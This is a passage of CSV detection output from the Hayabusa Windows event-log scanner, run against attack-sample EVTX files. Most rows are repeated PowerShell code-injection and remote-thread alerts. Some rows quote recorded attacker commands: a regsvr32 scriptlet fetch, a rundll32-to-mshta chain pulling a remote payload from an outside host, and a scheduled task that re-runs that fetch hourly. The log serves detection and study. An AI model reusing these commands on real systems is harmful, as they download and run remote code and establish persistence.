+09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla 
Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process 